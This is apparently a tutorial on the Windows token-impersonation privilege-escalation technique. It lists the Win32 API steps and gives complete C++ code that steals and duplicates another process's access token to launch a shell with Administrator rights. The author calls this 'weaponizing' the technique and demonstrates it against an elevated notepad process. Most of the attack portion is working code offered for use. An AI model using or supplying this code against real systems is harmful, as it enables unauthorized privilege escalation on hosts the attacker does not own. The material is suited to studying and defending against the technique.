Create Process with Token

Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with DuplicateToken(Ex) and use it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.
Example:
In simple terms, this is when a token of an already exisiting accoes token present in one of the running processes on the victim host, is retrieved, duplicated and then used for creating a new process
Step
Win32 API
Open a process with access token you want to steal
OpenProcess
Get a handle to the access token of that process
OpenProcesToken
Make a duplicate of the access token present in that process
DuplicateTokenEx
Create a new process with the newly aquired access token
CreateProcessWithTokenW
I will weaponize this technique using the following code:
Code:
#include "stdafx.h"#include #include int main(int argc, char * argv[]) {char a;HANDLE processHandle;HANDLE tokenHandle = NULL;HANDLE duplicateTokenHandle = NULL;STARTUPINFO startupInfo;PROCESS_INFORMATION processInformation;DWORD PID_TO_IMPERSONATE = 3060;wchar_t cmdline[] = L"C:\\shell.cmd";ZeroMemory(&startupInfo, sizeof(STARTUPINFO));ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));startupInfo.cb = sizeof(STARTUPINFO); processHandle = OpenProcess(PROCESS_ALL_ACCESS, true, PID_TO_IMPERSONATE);OpenProcessToken(processHandle, TOKEN_ALL_ACCESS, &tokenHandle);DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle); CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, NULL, cmdline, 0, NULL, NULL, &startupInfo, &processInformation);std::cin >> a; return 0;}
My target here is notepad as it is running with Administrator privileges and for the sake of demonstration purposes. Compiling the previous code with use the proper API calls to grab the token, duplicate it and open cmd prompt with Administrator privileges.
As you can see when running the compiled binary using PowerShell as the parent process of the ConsoleApplication running as the user but cmd process running as Administrator
Create a Process with Token
References: